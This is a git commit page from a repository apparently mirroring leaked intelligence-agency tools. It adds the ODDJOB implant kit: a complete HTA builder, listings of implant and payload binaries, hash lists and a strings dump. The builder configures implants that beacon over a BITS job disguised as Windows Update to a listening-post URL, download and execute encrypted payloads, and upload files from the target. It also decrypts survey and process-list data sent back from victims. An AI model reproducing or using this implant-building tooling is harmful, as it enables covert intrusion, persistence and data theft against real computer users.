yetangitu/NSA_Windows_tools
1
0
Fork 0
Code Issues Pull requests Releases Wiki Activity

oddjob

Browse source
This commit is contained in:
mstrch0c 2017-04-14 11:59:13 +02:00
parent c3628da5bc
commit 41a607949e
26 changed files with 4528 additions and 2 deletions
Download patch file Download diff file Expand all files Collapse all files

40
file-listing
View file

@ -1,5 +1,41 @@
.
├── matree
├── file-listing
├── oddjob
│   ├── Binaries
│   │   ├── oddjob_builder
│   │   │   ├── bin
│   │   │   │   ├── oddjob_v3_x64.dll
│   │   │   │   ├── oddjob_v3_x64.exe
│   │   │   │   ├── oddjob_v3_x86.dll
│   │   │   │   └── oddjob_v3_x86.exe
│   │   │   ├── builder
│   │   │   │   ├── oddjob_config_v3.exe
│   │   │   │   └── Projects
│   │   │   └── ODDJOB_BUilder_v3.hta
│   │   └── Payloads
│   │   ├── bigpayload.bin
│   │   ├── five_minute_beacon.bin
│   │   ├── greha_dll_x64.dll
│   │   ├── greha_dll_x86.dll
│   │   ├── OJ_Deleter_2.4.exe
│   │   ├── one_byte_payload.bin
│   │   ├── one_minute_beacon.bin
│   │   ├── process_list.bin
│   │   ├── two_minute_beacon.bin
│   │   └── zero_byte_payload.bin
│   ├── Not-For-Release
│   │   ├── hashes.txt
│   │   ├── oddjob_v3_x64.dllstrings.txt
│   │   ├── oddjob_v3_x64.exestrings.txt
│   │   ├── oddjob_v3_x86.dllstrings.txt
│   │   └── oddjob_v3_x86.exestrings.txt
│   ├── Testing-Docs
│   │   ├── ODDJOB_Testing.docx
│   │   └── tungsten_flame.txt
│   └── User-Docs
│   ├── BITSversions.xlsx
│   └── How_to_setup_IIS_7_for_ODDJOB.docx
├── README.md
├── swift
│   ├── 00503_0_254.242_2013mar02
│   ├── 00546_0_ensbdasa-09aug2013
@ -7747,4 +7783,4 @@
├── user.defaults
└── user.defaults.replay
1226 directories, 6521 files
1236 directories, 6547 files

BIN
oddjob/Binaries/Payloads/OJ_Deleter_2.4.exe Normal file
View file

Binary file not shown.

1
oddjob/Binaries/Payloads/bigpayload.bin Normal file
View file

File diff suppressed because one or more lines are too long

BIN
oddjob/Binaries/Payloads/five_minute_beacon.bin Normal file
View file

Binary file not shown.

BIN
oddjob/Binaries/Payloads/greha_dll_x64.dll Normal file
View file

Binary file not shown.

BIN
oddjob/Binaries/Payloads/greha_dll_x86.dll Normal file
View file

Binary file not shown.

1
oddjob/Binaries/Payloads/one_byte_payload.bin Normal file
View file

@ -0,0 +1 @@


BIN
oddjob/Binaries/Payloads/one_minute_beacon.bin Normal file
View file

Binary file not shown.

BIN
oddjob/Binaries/Payloads/process_list.bin Normal file
View file

Binary file not shown.

BIN
oddjob/Binaries/Payloads/two_minute_beacon.bin Normal file
View file

Binary file not shown.

0
oddjob/Binaries/Payloads/zero_byte_payload.bin Normal file
View file

798
oddjob/Binaries/oddjob_builder/ODDJOB_BUilder_v3.hta Normal file
View file

@ -0,0 +1,798 @@
<html>
<head>
<title>ODDJOB V3 Builder (supports ODDJOB v3.0)</title>
<hta:application SINGLEINSTANCE="yes" border="thick" ID=oMMApp>
<script language="vbscript">
Function FullPath(path)
Set objFSO = CreateObject("Scripting.FileSystemObject")
FullPath = objFSO.GetAbsolutePathName(path)
End Function
Sub CreateDir(path)
Set objFSO = CreateObject("Scripting.FileSystemObject")
path = objFSO.GetAbsolutePathName(path)
if(not objFSO.FolderExists(path)) then
Set objFolder = objFSO.CreateFolder(path)
End If
End Sub
Function BaseName(path)
Set objFSO = CreateObject("Scripting.FileSystemObject")
BaseName = objFSO.GetBaseName(path)
End Function
Sub ProjChange
Project.Value = ProjectList.Value
End Sub
Sub TaskChange
'If(TaskList.selectedIndex > 0) Then
'PayloadName.Value = ""
'End If
'If(TaskList.selectedIndex = 3) Then
'Argument.Value = "00:14:00"
'Else
'Argument.Value = ""
'End If
End Sub
Sub CopyFile (src, dest)
Const OverwriteExisting = True
Set objFSO = CreateObject("Scripting.FileSystemObject")
src = objFSO.GetAbsolutePathName(src)
dest = objFSO.GetAbsolutePathName(dest)
'MsgBox src & " " & dest
objFSO.CopyFile src , dest, OverwriteExisting
End Sub
Function ZeroPad( ByVal sNumber, ByVal nPadFactor )
ZeroPad = Right( String( nPadFactor, "0" ) & Trim( sNumber ), nPadFactor )
End Function
Function CheckFile(path)
Set objFSO = CreateObject("Scripting.FileSystemObject")
If(Not objFSO.FileExists(path)) Then
MsgBox path & " not found, please build implant source before continuing"
Exit Function
End If
End Function
Sub LoadTextAreaFromFile(path, elem)
ForReading = 1
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFile = objFSO.OpenTextFile(path, ForReading)
'Do Until objFile.AtEndOfStream
'strLine = objFile.ReadLine
'Set objOption = Document.createElement("OPTION")
'objOption.Text = strLine
'objOption.Value = strLine
'list.Add(objOption)
'Loop
elem.InnerText = objFile.ReadAll
objFile.Close
End Sub
Sub EnumFolders(Path)
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFolder = objFSO.GetFolder(Path)
Set colSubfolders = objFolder.Subfolders
For Each objSubfolder in colSubfolders
If(Left(objSubFolder.Name, 1) <> ".") then
Set objOption = Document.createElement("OPTION")
objOption.Text = objFSO.GetFileName(objSubFolder.Name)
objOption.Value = objFSO.GetFileName(objSubFolder.Name)
ProjectList.Add(objOption)
End If
Next
End Sub
Function DateDir
curDate = Now()
DateDir = ZeroPad(Year(curDate),4) & ZeroPad(Month(curDate),2) & ZeroPad(Day(curDate),2) & _
"-" & _
ZeroPad(Hour(curDate),2) & ZeroPad(Minute(curDate),2) & ZeroPad(Second(curDate),2)
End Function
Sub VBInit
Set objFSO = CreateObject("Scripting.FileSystemObject")
curDir = objFSO.GetAbsolutePathName(".")
'MsgBox DateDir()
buildPath = curDir & "\builder"
EnumFolders(buildPath & "\Projects")
CheckFile(buildPath & "\oddjob_config_v3.exe")
Project.Value = ProjectList.Value
End Sub
Sub SaveStringToFile (path, string)
ForWriting = 2
Set objFSO = CreateObject("Scripting.FileSystemObject")
If(Not objFSO.FileExists(path)) Then
objFSO.CreateTextFile(path)
End If
Set objFile = objFSO.OpenTextFile(path, ForWriting, False)
objFile.Write(string)
objFile.Close
End Sub
</script>
<script language="javascript">
function Exec(cmdLine, outStr)
{
var oShell = new ActiveXObject("WScript.Shell");
var oExec = oShell.Exec(cmdLine);
while(!oExec.StdOut.AtEndOfStream)
{
outStr += oExec.StdOut.Read(1);
}
}
function StrVal(elem)
{
var s = elem.value;
if(s == "")
return "0";
else
return s;
}
function Build(operation)
{
var oshell = new ActiveXObject("WScript.Shell");
var oExec;
var sString = "";
var sProject = Project.value;
var sDate = DateDir();
// clear the error and output windows
oError.innerText = "";
oAppInfo.innerText = "";
oAppLoc.outerHTML = '<a id="oAppLoc" href="">' + '</a>';
oLogLoc.outerHTML = '<a id="oLogLoc" href="">' + '</a>';
// create project directory
var sProjDir = "builder\\Projects\\" + sProject + "\\";
CreateDir(sProjDir);
//
// Build the command line
//
var sConfig = "builder\\oddjob_config_v3.exe";
var sImplant = "";
var sSrcImplant = "";
var sRelease = "bin";
var sCmdLine = FullPath(sConfig);
sCmdLine = "\"" + sCmdLine + "\"";
sSrcImplant = FullPath(sRelease);
//choose dll or exe and x86 or x64
if(OutputType.selectedIndex == 0)
{
sSrcImplant += "\\oddjob_v3_x86.dll";
}
if(OutputType.selectedIndex == 1)
{
sSrcImplant += "\\oddjob_v3_x64.dll";
}
if(OutputType.selectedIndex == 2)
{
sSrcImplant += "\\oddjob_v3_x86.exe";
}
if(OutputType.selectedIndex == 3)
{
sSrcImplant += "\\oddjob_v3_x64.exe";
}
//configure implant
if(operation == 0)
{
// create directory with date stamp for this build
var sBuildDir = sProjDir + sDate;
CreateDir(sBuildDir);
//check args
if(sProject == "")
{
oError.innerText = "Please specify a project";
return;
}
if(JobName.value == "")
{
oError.innerText = "Please set job name";
return;
}
if(URL1.value == "")
{
oError.innerText = "Please set URL";
return;
}
if(GetRequestExtension.value == "")
{
oError.innerText = "Please set get request extension";
return;
}
if(FileExtension.value == "")
{
oError.innerText = "Please set file extension";
return;
}
if(TimeToLive == "")
{
oError.innerText = "Please set time to live";
return;
}
if(Beacon.value == "")
{
oError.innerText = "Please set beacon interval";
return;
}
if(BeaconCount.value == "")
{
oError.innerText = "Please set beacon count";
return;
}
if(OutputFile.value == "") {
oError.innerText = "Please specify a file name (\"Output File Name\" cannot be empty)";
return;
}
if(DLLExport.value == "" || DLLExport.value.length < 1 || DLLExport.value.length > 5) {
oError.innerText = "DllExport name is required and must be between 1 and 5 characters long";
return;
}
//copy clean implant.exe over to build dir
if(OutputType.selectedIndex >1)
{
sImplant += sBuildDir + "\\" + OutputFile.value + ".ex_"
CopyFile(sSrcImplant, sImplant);
}
else
{
sImplant += sBuildDir + "\\" + OutputFile.value + ".dll"
CopyFile(sSrcImplant, sImplant);
}
//add cmd flag and implant path
sCmdLine += " -configure " + "\"" + sImplant + "\"";
//add BITS job name
sCmdLine += " " + "\"" + JobName.value + "\"";
//add beacon URL
sCmdLine += " " + URL1.value;
//add Upload job name
sCmdLine += " " + "\"" + UploadJobName.value + "\"";
//add upload filename
sCmdLine += " " + "\"" + UploadFileName.value + "\"";
//add extra url
sCmdLine += " " + URL2.value;
//add get request extention
sCmdLine += " " + GetRequestExtension.value;
//add file request extension
sCmdLine += " " + FileExtension.value;
//add Time to Live
sCmdLine += " " + TimeToLive.value;
//add beacon interval
sCmdLine += " " + Beacon.value;
//add beacon count
sCmdLine += " " + BeaconCount.value;
//add Time to Live
sCmdLine += " " + UTimeToLive.value;
//add beacon interval
sCmdLine += " " + UBeacon.value;
//add multipayload or single
sCmdLine += " " + (MultiList.selectedIndex^1); //need to flip to make configure script happy since we switche default
sCmdLine += " " + DLLExport.value;
if(HighPriority.checked) {
sCmdLine += " 2";
} else {
sCmdLine += " 1";
}
// display the results in the PRE tag
oAppLoc.outerHTML = '<a id="oAppLoc" href="file://' + FullPath(sImplant) + '">' + FullPath(sImplant) + '</a>';
//log file location
oLogLoc.outerHTML = '<a id="oLogLoc" href="file://' + FullPath(sProjDir) + "\\" + sDate + "\\build.log" + '">' + FullPath(sProjDir) + "\\" + sDate + "\\build.log" + '</a>';
}
//decrypt survey data
if(operation == 1)
{
if(SurveyData.value == "")
{
oError.innerText = "Please fill in survey field";
return;
}
sCmdLine += " -decrypt " + SurveyData.value;
}
//encrypt payload
if(operation == 2)
{
if(inpayload.value == "" || outpayload.value == "" || SurveyData2.value == "")
{
oError.innerText = "Please fill in payload fields and survey data";
return;
}
sCmdLine += " -encryptpayload ";
sCmdLine += inpayload.value + " " + outpayload.value + " " + SurveyData2.value + " " + PayloadType.selectedIndex + " " + dllOrdinal.value;
}
// DecryptProcessList
if(operation == 3)
{
if((inencdumpproc.value == "") || (outdecdumpproc.value == ""))
{
oError.innerText = "Please specify input and output files. Input files should be of the form 408547727p1T98kPA+Ts5+xl5CNZ0B-0l6xyqug5we70syK9kN-aJOmZM2aLoXeJXAGW9fzrtfgqXSqeuDvYUI01gNs1RTen71-NgAAjkB-J4.cab";
return;
}
sCmdLine += " -decryptDumpProcess ";
sCmdLine += "\"" + inencdumpproc.value + "\"";
sCmdLine += " " + "\"" + outdecdumpproc.value + "\"";
}
//dumpconfig
if(operation == 4)
{
if(oddjobbinary.value == "")
{
oError.innerText = "Please specifiy ODDJOB binary to dump config from";
return;
}
sCmdLine += " -dumpconfig ";
sCmdLine += "\"" + oddjobbinary.value + "\"";
}
//genpublickey
if(operation == 5)
{
sCmdLine += " -genpubkey ";
}
//genprivatekey
if(operation == 6)
{
sCmdLine += " -genprivatekey";
}
//
// Execute ODDJOB config
//
oError.innerText = sCmdLine;
oExec = oshell.Exec(sCmdLine);
// Read it's output
while(!oExec.StdOut.AtEndOfStream)
{
sString += oExec.StdOut.Read(1);
}
oAppInfo.innerText = sString;
if(operation == 0)
{
SaveStringToFile (FullPath(sProjDir) + "\\" + sDate + "\\build.log","++++ " + sDate + " ++++")
SaveStringToFile (FullPath(sProjDir) + "\\" + sDate + "\\build.log", sString)
}
//SaveStringToFile(FullPath(sBuildDir) + "\\build.log", sString);
// + FullPath(sFTPath) + ">smeg</a>";
window.scrollBy(0,document.body.clientHeight);
}
function Init()
{
VBInit();
}
</script>
<style type="text/css">
input { padding-right: 20px; }
</style>
</head>
<body onLoad="Init()">
<div name="Form" id="Form" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif">
<DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
ms_positioning="FlowLayout">
<input type="submit" name="Button1" onClick="Build(0)" value="Build" id="Submit4" DESIGNTIMEDRAGDROP="35" />
</DIV>
<div style="PADDING-LEFT: 5px">
<H3>
<P></P>
Build New implant for x86 or x64</H3>
<P>&nbsp;
Hover mouse over "?" for more information.
<table>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Project:</td>
<td style="width:500px"><input name="Project" style="width:248px" type="text" id="Text1" value="TEST"/>
<select name="ProjectList" onChange="ProjChange()" style="width:248px" type="text" id="Select1" value=""/>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">BITS Job Name:</td>
<td>
<input name="JobName" style="width:248px" type="text" id="JobName" value="Wu Update Client "/>
<a style="cursor:help;" title="BITS job name that appears on target. Choose something none suspicious and not already existing on target. 'Wu Update Client' is default Windows Update BITS job name so adding a space to create 'Wu Update Client ' works well.">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:250px;font-weight:bold">Output File Name <span style="font-weight: normal; font-size: 13px">(No extension)</span>:</td>
<td>
<input name="OutputFile" style="width:248px" type="text" id="OutputFile" value=""/>
<a style="cursor:help;" title="Filename of the output file. This filename will be updated in the PE file's export section, along with the PE file checksum. Do not include the file extension, it will be added automatically.">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Primary URL:</td>
<td >
<input name="URL1" type="text" id="URL1" style="width:500px" value="http://www.update.com/msdownload/update/v3-19990518/cabpool"/>
<a style="cursor:help;" title="LP that ODDJOB beacons to. Can use URL or IP address. Do not include trailing slash in URL.">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Dummy URL:</td>
<td >
<input name="URL2" type="text" id="URL2" style="width:500px" value="http://www.yahoo.com"/>
<a style="cursor:help;" title="URL that we will not beacon to. Do not look up this domain.">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Get Request Extension:</td>
<td >
<input name="GetRequestExtension" type="text" id="GetRequestExtension" style="width:248px" value=".cab"/>
<a style="cursor:help;" title="extension that will be appended to the end of the get requests (default .cab)">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">File Extension:</td>
<td >
<input name="FileExtension" type="text" id="FileExtension" style="width:248px" value=".cab"/>
<a style="cursor:help;" title="extension that will be appended to the temp file on target (default .cab)">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Time To Live (secs):</td>
<td>
<input name="TimeToLive" style="width:248px" type="text" id="TimeToLive" value="0"/>
<a style="cursor:help;" title="Leave value of 0. Does not imply time to live on target but relates to BITS job parameters">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Beacon Interval (secs):</td>
<td>
<input name="Beacon" style="width:248px" type="text" id="Beacon" value="14400"/>
<a style="cursor:help;" title="How often to call back in seconds.">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Beacon Count:</td>
<td>
<input name="BeaconCount" style="width:248px" type="text" id="BeaconCount" value="540"/>
<a style="cursor:help;" title="Will stop calling back after x beacons. The beacons must successfully leave the target to be considered a beacon. After x beacons the BITS job will die but the ODDJOB binary will still exist on target and just never be executed again.">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Upload Job Name:</td>
<td>
<input name="UploadJobName" style="width:248px" type="text" id="Text2" value="Upload"/>
<a style="cursor:help;" title="Leave blank if not using upload feature">?</a>
</td>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Upload File Name:</td>
<td>
<input name="UploadFileName" style="width:248px" type="text" id="Text3" value="4393update.xml"/>
<a style="cursor:help;" title="File that ODDJOB will upload if found on target. ODDJOB checks if file exists each time it runs. File is looked for in the user's temp directory">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Upload Time To Live (secs):</td>
<td>
<input name="UTimeToLive" style="width:248px" type="text" id="Text4" value="2592000"/>
<a style="cursor:help;" title="Time in seconds between upload attempts.">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Upload Beacon Interval (secs):</td>
<td>
<input name="UBeacon" style="width:248px" type="text" id="Text5" value="14400"/>
<a style="cursor:help;" title="How often to try and upload the specified file once it exists on target.">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold;text-align:top">MultiPayload:</td>
<td>
<select name="MultiList" style="width:248px" type="text" id="MultiList" value="">
<option name="EXE">YES</option>
<option name="Multi">NO</option>
</select>
<a style="cursor:help;" title="Multipayload instructs ODDJOB to continue to callback, download and execute more than one payload. If this is set to 'no' then ODDJOB will only download and execute one payload after which it will not callback anymore. The implant will still exist on target but will never be executed again.">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold;text-align:top">High Priority Job:</td>
<td>
<input type="checkbox" name="HighPriority" value="2"></input>
</td>
</TD>
<tr><td><p>&nbsp</p></td></tr>
<TR>
<td valign="top" style="width:250px;font-weight:bold">DLL Export Name:</td>
<td>
<input name="DLLExport" style="width:248px" type="text" id="DllExport" value="start"/>
<a style="cursor:help;" title="Exported function name for the DLL. The default is &quot;start&quot; and the limit is 5 characters">?</a>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold;text-align:top">Output Type:</td>
<td>
<select name="OutputType" style="width:248px" type="text" id="Select3" value="">
<option name="DLL_x86">DLL x86 (32-bit)</option>
<option name="DLL_x64">DLL x64 (64-bit)</option>
<option name="EXE_x86">EXE x86 (32-bit)</option>
<option name="EXE_x64">EXE x64 (64-bit)</option>
</select>
</TD>
</TR>
</table>
</p>
</div>
<DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: white"
ms_positioning="FlowLayout">
</DIV>
</div>
<div name="Form" id="Div1" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif">
<DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
ms_positioning="FlowLayout">
<input type="submit" name="Button1" onClick="Build(1)" value="Decrypt" id="Submit1" DESIGNTIMEDRAGDROP="35" />
</DIV>
<div style="PADDING-LEFT: 5px">
<H3>
<P></P>
Decrypt Survey Data</H3>
<P>&nbsp;
<table>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Survey Data:</td>
<td>
<input name="SurveyData" style="width:700px" type="text" id="SurveyData" value=""/>
<a style="cursor:help;" title="ex. IbMdY8bgyTifVoEm0tbAy7otG53W8drKiuJ+MbTde5nXVWDDGguv3ARXJfr1-a8-djmk3kkHsTdSAPocHoqpgsab166.cab">?</a>
</TD>
</TR>
</table>
</p>
</div>
<DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: white"
ms_positioning="FlowLayout">
</DIV>
</div>
<div name="Form" id="Div2" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif">
<DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
ms_positioning="FlowLayout">
<input type="submit" name="Button1" onClick="Build(2)" value="EncryptPayload" id="Submit2" DESIGNTIMEDRAGDROP="35" />
</DIV>
<div style="PADDING-LEFT: 5px">
<H3>
<P></P>
Payload Encryption</H3>
<P>&nbsp;
<table>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Unencrypted payload:</td>
<td ><input name="inpayload" type="file" id="inpayload" style="width:500px"></TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Encrypted payload:</td>
<td ><input name="outpayload" type="file" id="outpayload" style="width:500px"></TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold;text-align:top">Payload Type:</td>
<td>
<select name="PayloadType" style="width:248px" type="text" id="Select2" value="">
<option name="CMD">NULL</option>
<option name="EXE">EXE</option>
<option name="DLL">DLL</option>
<option name="CMD">CMD</option>
</select>
<span style="font-weight:bold;text-align:top"> DLL Ordinal: <input type="text" name="dllOrdinal" value="0" /></span>
</TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Survey Data:</td>
<td>
<input name="SurveyData2" style="width:700px" type="text" id="SurveyData2" value=""/>
<a style="cursor:help;" title="ex. IbMdY8bgyTifVoEm0tbAy7otG53W8drKiuJ+MbTde5nXVWDDGguv3ARXJfr1-a8-djmk3kkHsTdSAPocHoqpgsab166.cab">?</a>
</TD>
</TR>
</table>
</p>
</div>
<div name="Form" id="Div2" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif">
<DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
ms_positioning="FlowLayout">
<input type="submit" name="Button1" onClick="Build(3)" value="DecryptProcessList" id="Submit2" DESIGNTIMEDRAGDROP="35" />
</DIV>
<div style="PADDING-LEFT: 5px">
<H3>
<P></P>
Decrypt Uploaded Process List</H3>
<P>&nbsp;
<table>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Encrypted Upload File:</td>
<td ><input name="inencdumpproc" type="file" id="inencdumpproc" style="width:500px"></TD>
</TR>
<TR>
<td valign="top" style="width:180px;font-weight:bold">Decrypted Output File:</td>
<td ><input name="outdecdumpproc" type="file" id="outdecdumpproc" style="width:500px"></TD>
</TR>
</table>
</p>
</div>
<DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: white"
ms_positioning="FlowLayout">
</DIV>
</div>
<div name="Form" id="Div3" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif">
<DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
ms_positioning="FlowLayout">
<input type="submit" name="Button1" onClick="Build(4)" value="DumpConfig" id="Submit3" DESIGNTIMEDRAGDROP="35" />
</DIV>
<div style="PADDING-LEFT: 5px">
<H3>
<P></P>
Dump implant configuration data</H3>
<P>&nbsp;
<table>
<TR>
<td valign="top" style="width:180px;font-weight:bold">ODDJOB Binary:</td>
<td ><input name="oddjobbinary" type="file" id="oddjobbinary" style="width:500px"></TD>
</TR>
</table>
</p>
</div>
<div name="Form" id="Div4" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif">
<DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
ms_positioning="FlowLayout">
<input type="submit" name="Button1" onClick="Build(5)" value="GenPublicKey" id="Submit5" DESIGNTIMEDRAGDROP="35" />
</DIV>
<div style="PADDING-LEFT: 5px">
<H3>
<P></P>
Generate public key to be put into implant code</H3>
<P>&nbsp;
</p>
</div>
<div name="Form" id="Div5" style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid; FONT-FAMILY: Sans-Serif">
<DIV style="PADDING-LEFT: 5px; PADDING-BOTTOM: 5px; WIDTH: 100%; PADDING-TOP: 5px; BORDER-BOTTOM: thin solid; HEIGHT: 24px; BACKGROUND-COLOR: silver"
ms_positioning="FlowLayout">
<input type="submit" name="Button1" onClick="Build(6)" value="GenPrivateKey" id="Submit6" DESIGNTIMEDRAGDROP="35" />
</DIV>
<div style="PADDING-LEFT: 5px">
<H3>
<P></P>
Generate implant private key to be put into config tool</H3>
<P>&nbsp;
</p>
</div>
<P style="font-family:Courier New" ID=oError style="color:red"></PRE>
<PRE ID=oAppInfo> </PRE>
<PRE>ODDJOB files located at:<br><a ID=oAppLoc href=""></a></PRE>
<PRE ID=oLogInfo> </PRE>
<PRE>Log files located at:<br><a ID=oLogLoc href=""></a></PRE>
</body>
</html>

BIN
oddjob/Binaries/oddjob_builder/bin/oddjob_v3_x64.dll Normal file
View file

Binary file not shown.

BIN
oddjob/Binaries/oddjob_builder/bin/oddjob_v3_x64.exe Normal file
View file

Binary file not shown.

BIN
oddjob/Binaries/oddjob_builder/bin/oddjob_v3_x86.dll Normal file
View file

Binary file not shown.

BIN
oddjob/Binaries/oddjob_builder/bin/oddjob_v3_x86.exe Normal file
View file

Binary file not shown.

BIN
oddjob/Binaries/oddjob_builder/builder/oddjob_config_v3.exe Normal file
View file

Binary file not shown.

5
oddjob/Not-For-Release/hashes.txt Normal file
View file

@ -0,0 +1,5 @@
325770d2e11bfb36d59d94bd4113ca5712877a39 *../Binaries/oddjob_builder/bin/oddjob_v3_x64.dll
742604660ba4aa04c44ad4d73c2b98ad24204b2a *../Binaries/oddjob_builder/bin/oddjob_v3_x64.exe
cbbbb1cf3616fa794a722c68e41824cd8f017982 *../Binaries/oddjob_builder/bin/oddjob_v3_x86.dll
8c930b130e82762581f1f9b3510442809df86d22 *../Binaries/oddjob_builder/bin/oddjob_v3_x86.exe
68f0f4f78426dbf2a9e3abc4b4aa8d23ebc1e335 *../Binaries/oddjob_builder/builder/oddjob_config_v3.exe

1148
oddjob/Not-For-Release/oddjob_v3_x64.dllstrings.txt Normal file
View file

File diff suppressed because it is too large Load diff

1109
oddjob/Not-For-Release/oddjob_v3_x64.exestrings.txt Normal file
View file

File diff suppressed because it is too large Load diff

624
oddjob/Not-For-Release/oddjob_v3_x86.dllstrings.txt Normal file
View file

@ -0,0 +1,624 @@
QQSVW
SVW3
pSVW
CDPP
PWVj
@@f;
uM!E
SVWh
Phx8
@@f;
QSVWhX6
t1WPV
tdVSP
tB9}
PWWV
u39]
tUSh
Shp6
uXjHSh
PWWh
t-Wj
uq9}
PSWWW
PSWj
AAHHJu
Wj Y
j=Yf
j=Yf
u 9E
YY9}
4891r)
D$$
D$hSP
D$`P
D$ P
D$ P
QQSV
u#jHj
t;8]
u6jD
PVVh
It&It
@@f;
@@f;
AAf;
@@f;
SVW3
vMh@4
SSSS
w6SSj
SSSS
w9SSj
SVW3
PjYjCV
QQVW
jUY3
9A;M
SuPW
@@f;
@@f;
t!SWP
@@f;
t>Sj
_^9]
jUZ3
PSSSSSSh
PSSj
t VP
GGBBf
SSSSS
AAf9
WWWWW
uaVj
uL9=0g
AAFFf
wIVSP
9=0g
FVSj
VVVVV
r f=Z
r f=Z
CCGG
t=f;
CCGG
95`g
VVVVV
r f=Z
r f=Z
GGBB
8VVVVV
f91t
AAKu
AAGGf;
_^[]
u59=@_
9=@_
VVVVV
VVVVV
uWS3
ueSj
@_^[
VW}
j?^;
Y__^[
9csm
VVVVV
VVVVV
YYu6h
QQSV3
SSSSS
PPPPP
SSSSS
SSSSS
SSSSS
_[^]
_^[]
VVVV
RPSV
90tN
@t7f
PPPPP
t$hT(
YYt1V
Y;=xY
Whd(
0A@@Ju
95Dg
Fh=pS
Wto=
Y_^[]
_^[]
Fpt"
S99t
~du
jThX<
j$j _W
Nj$j
QQVW3
t)WSR
PPPPP
?"u?
< tI< tE
@@f9
@@f9
SSS+
@PWSS
t!SS
WWWWW
t!hX)
URPQQh
L$,3
UVWS
[_^]
SVWj
_^[]
9MZt
_^[]
t+Ht
PPPPP
SVW
SSSSS
tm95
SSSSS
0SSSSS
_^[]
0SSSSS
_^[]
VVVVV
WWWWW
WWWWW
VVVVV
VVVVV
GGAAf
@@FFf
@@FF
WWWWW
VVVVV
VVVVV
VVVVV
Yt"V
Yt.V
Yt"V
Yt.V
Yt"V
YYt}
~%9M
QVj
r 8^
v N+D$
oV f
o^0f
of@f
onPf
ov`f
o~pf
j,hX=
u8SS3
u$SS
t!VV9u u
9] SS
v$;5
PPPPPPPP
_^[]
0SSSSS
PPPPPPPP
u6SSj
t @@;
uR9]
9] u
9E Yt
SSSS
txVS
t0WWWWW
Af#E
SVWUj
]_^[
;t$,v-
UQPXY]Y[
VW|[;
_^[]
VVVVV
~,WPV
98t^
tVPV
t/9U
